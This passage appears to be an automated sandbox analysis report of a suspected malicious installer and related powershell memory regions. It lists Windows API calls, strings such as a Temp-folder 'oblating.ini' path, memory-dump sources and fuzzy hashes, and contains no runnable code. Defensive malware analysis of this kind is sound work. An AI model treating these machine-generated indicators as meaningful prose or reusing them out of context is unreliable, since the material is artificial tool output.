                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                • String ID: Calibri
                                                                • API String ID: 3808545654-1409258342
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                • MulDiv.KERNEL32(000D1E95,00000064,000D1E99), ref: 00402E3C
                                                                • wsprintfW.USER32 ref: 00402E4C
                                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 00402E46
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                APIs
                                                                • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                • wsprintfW.USER32 ref: 00404B52
                                                                • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s$6B
                                                                • API String ID: 3540041739-3884863406
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025E8
                                                                • lstrlenA.KERNEL32(nerveklinikkernes,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Similarity
                                                                • API ID: ByteCharMultiWidelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$nerveklinikkernes
                                                                • API String ID: 3109718747-2559318862
                                                                • Opcode ID: 6fe48562458a27e729fff662e17573b5408da1b41df62b44909c30a4cd300cf5
                                                                • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                • Opcode Fuzzy Hash: 6fe48562458a27e729fff662e17573b5408da1b41df62b44909c30a4cd300cf5
                                                                • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                • GetLastError.KERNEL32 ref: 00405812
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                • GetLastError.KERNEL32 ref: 00405831
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 3449924974-1876063424
                                                                • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                • Instruction ID: fd95e7d74cf6809d4f8eb1fd1b0c41c525f08b7aa6685e2bd119da418b5cf1ce
                                                                • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                • Instruction Fuzzy Hash: 61011A72D00219DADF009FA0CD447EFBBB4EF14305F00803AD944B6280DB789658CFA9
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 2659869361-4083868402
                                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0040528F
                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                  • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                • GlobalFree.KERNEL32(?), ref: 00403900
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Free$GlobalLibrary
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 1100898210-4083868402
                                                                • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                APIs
                                                                • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CharPrevlstrlen
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 2709904686-1876063424
                                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98
                                                                • Instruction Fuzzy Hash: 6BE159B4A00246AFDB10CF98D550FAABBB2EFC9315F15C059E915AB391C7B2EC41CB91
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e0d946f950f2c1a2ee1c41f18bf097db8e12f923cc6d2e0e7cbe0477700b6ec7
                                                                • Instruction ID: e303a0ca617b107221c9af1d73e8d6dc425b6c0223884e51f7d2b720c6ba930a
                                                                • Opcode Fuzzy Hash: e0d946f950f2c1a2ee1c41f18bf097db8e12f923cc6d2e0e7cbe0477700b6ec7
                                                                • Instruction Fuzzy Hash: BFE10875A012099FDB55CF98D894BADBBB2FF88310F248159E809EB391C735ED81CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6c42d150420202f09f34721cc7b1528110be030f76f575a9cb5722d4808d57c
                                                                • Instruction ID: 108ee502fda316add24fbb0a8aef78c8099cb1c30bf086d1a095db5a5af505f2
                                                                • Opcode Fuzzy Hash: d6c42d150420202f09f34721cc7b1528110be030f76f575a9cb5722d4808d57c
                                                                • Instruction Fuzzy Hash: 7FC19CB4A10305AFDB19CF54C840BAEBBB2AF89304F14C46AD9156F795CB39EC45CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9421bc76a0470495642b0820c34a9559107a39a270ffd37d1e3507f1a975ac9d
                                                                • Instruction ID: ec29fd1e508a2da0d1ab008956da7ef64d616cf3cb75e09e3ba2557d6ba4abd2
                                                                • Opcode Fuzzy Hash: 9421bc76a0470495642b0820c34a9559107a39a270ffd37d1e3507f1a975ac9d
                                                                • Instruction Fuzzy Hash: 5B715AF1710306EFCB269F2888007AABBB2EFD5211F14847AD526CB641EB3DD941C791
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce5546ba96681659b37b82337006c01162cd5862d1404db5617a51075927871b
                                                                • Instruction ID: ce57e18a3539f9ab09b2bcd8a4fc98ad84215fa8c1b8eb657f7459b9cf1ad788
                                                                • Opcode Fuzzy Hash: ce5546ba96681659b37b82337006c01162cd5862d1404db5617a51075927871b
                                                                • Instruction Fuzzy Hash: B7816A6280E3C15FD3179B7898793953FB0AF93255B1A00DBC0D1CF1B3E669894AC7A6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cab27292f1c8132541ae182f81d0a8191fc8ca8d29daa7ac332fbde3f1e8571
                                                                • Instruction ID: 70bb7b2a3197b15437d45298def79bf68dbd6b8f605bef566ee28bb0f22410bd
                                                                • Opcode Fuzzy Hash: 1cab27292f1c8132541ae182f81d0a8191fc8ca8d29daa7ac332fbde3f1e8571
                                                                • Instruction Fuzzy Hash: 86817B35B002198FDB54DFA8D850BAEB7B6FFC8200F148569E809DB395DB359C06CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f138ae00535fffc0948d0ad287fe057f045afd405a4853009933e36ca5fac79
                                                                • Instruction ID: 6e51a3085fa41845af3d31fc8bc0280b360daf3dcbe53ea9f38b2e1df13b8e92
                                                                • Opcode Fuzzy Hash: 6f138ae00535fffc0948d0ad287fe057f045afd405a4853009933e36ca5fac79
                                                                • Instruction Fuzzy Hash: F2816AB4A19204DFDB14CF44C588EA9BBB6EF99314F18C09AE905AB755CB32EC41CF50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc5deab97976f4e10248e9a141797bf100f4d1faaf081ee16582f2abd5772209
                                                                • Instruction ID: febf0e85a9f798f4568ae76cf54478f713f1abe2de46afea6898b34923b61bd7
                                                                • Opcode Fuzzy Hash: fc5deab97976f4e10248e9a141797bf100f4d1faaf081ee16582f2abd5772209
                                                                • Instruction Fuzzy Hash: 20515430A006059FCB55CF5CC8A5AAEBBB2FF89310F248559E925EB3A5C735EC52CB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ccf96492a4c6b07c05bf7e9682ee4d3a4562eec0f7498ab5bd9551966070725f
                                                                • Instruction ID: 5a91045d2dbdacda0b04e030d59ee11bfdfd03733e3b1e78f6f3b8a3addee72a
                                                                • Opcode Fuzzy Hash: ccf96492a4c6b07c05bf7e9682ee4d3a4562eec0f7498ab5bd9551966070725f
                                                                • Instruction Fuzzy Hash: B9517D34A016458FCB45CF5CC8A4AAEBBB1FF89310F648199E925EB3A5C335EC51CB94
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46002c12ee42462f699b2ff8137716b1658e00e9c4e295970af0ae3d2653a93e
                                                                • Instruction ID: 820cb440e21b03542371a1ddcd3bc3e1456121a6d6c9c5367c7109c551b06f0c
                                                                • Opcode Fuzzy Hash: 46002c12ee42462f699b2ff8137716b1658e00e9c4e295970af0ae3d2653a93e
                                                                • Instruction Fuzzy Hash: AC517F75A046099FCB45CF5CC894AAEBBB2FF88324F248259E915E73A1C735EC51CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 112698d360d6bb2aa4d57fd07821f49e8b73336f64ccad5b359831d34d728773
                                                                • Instruction ID: ca94efc31a838dbe1d20591b137ab1887af684a7529d7095437500557caa4b6f
                                                                • Opcode Fuzzy Hash: 112698d360d6bb2aa4d57fd07821f49e8b73336f64ccad5b359831d34d728773
                                                                • Instruction Fuzzy Hash: 05512D70A106099FCB55CF9CC895AAEF7B2FF88310B248659E925E73A4C735EC51CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ddea7d65748caa6958857e8f0c9a2fbcf53ac6dd8e3b5e41e32c94550baed587
                                                                • Instruction ID: 120a7dafbb62dfc3ef140184e5bbbe60d38936fe597ba6789b854852dceab460
                                                                • Opcode Fuzzy Hash: ddea7d65748caa6958857e8f0c9a2fbcf53ac6dd8e3b5e41e32c94550baed587
                                                                • Instruction Fuzzy Hash: 37513F30A006099FCB55CF5CC895AAEF7B2FF88310B248559E925E7395C735EC52CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1a02cd26bc2dab05dafab50a3d2c37edd2c9d2639bcdf2025f84b552f7b727c
                                                                • Instruction ID: 35b08a39f8b54f85585ef0da34b354fbbfe2569bf4e7068fbe40afab03c7f70f
                                                                • Opcode Fuzzy Hash: e1a02cd26bc2dab05dafab50a3d2c37edd2c9d2639bcdf2025f84b552f7b727c
                                                                • Instruction Fuzzy Hash: CE4127B2B10216EBCF249B69D80026EF7F5AFD4211B14846AD926EB240EB31D901D7E1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4cb5e358018c9a7bbedc6534b20e25fcc3b51ad880c4e19a01eb10db90e6060b
                                                                • Instruction ID: c1e3103cd32d28491f60b4ea0ee9b075044050269a10f25567798ecfd80d219c
                                                                • Opcode Fuzzy Hash: 4cb5e358018c9a7bbedc6534b20e25fcc3b51ad880c4e19a01eb10db90e6060b
                                                                • Instruction Fuzzy Hash: 9B51EA34A002099FDB45CF98D894B9DFBB2FF88314F248559E804AB3A5C735ED82DB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9d1e52212efa8fe86a3ba3c37a3f562264f17fbfcc297c4cedb0509ed5edda3
                                                                • Instruction ID: 86a178c1338c950a9f459c8255c83c16b8ef02fa4a74b87097c254bd1fa2eb8b
                                                                • Opcode Fuzzy Hash: b9d1e52212efa8fe86a3ba3c37a3f562264f17fbfcc297c4cedb0509ed5edda3
                                                                • Instruction Fuzzy Hash: 8F411974A046059FCB48CF98C8949AEB7B2BF89320B248259E915EB390D335EC41CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e5b2a6dbad0ab551597980e86749a22e6de03a4fa604050be75909ec8af8e53
                                                                • Instruction ID: 45828fbfdc33305465260e4d80920b47ae30fa09ea87ab25d77a40dc52e90c86
                                                                • Opcode Fuzzy Hash: 2e5b2a6dbad0ab551597980e86749a22e6de03a4fa604050be75909ec8af8e53
                                                                • Instruction Fuzzy Hash: 54412A74A016099FCB45CF5CC8A4AAEB7B1FF88314F648258E925E73A5C335EC51CB94
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 475221f94c2b2f5cd025f95103c4eb79438f44e54c11dcbe193ee009989fcb02
                                                                • Instruction ID: 70b1b161fb5f3c66e658c8abd362ffeddd54c8295e1fbc17de6fa0b742a6891c
                                                                • Opcode Fuzzy Hash: 475221f94c2b2f5cd025f95103c4eb79438f44e54c11dcbe193ee009989fcb02
                                                                • Instruction Fuzzy Hash: 7F411D75A046099FCB54CF58C894AAEFBF2FF88324B248258E915E73A4D735EC51CB90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2b41d0af2b17e13572e04530705f527368211b07cfb8bcc709c7e438bff5be17
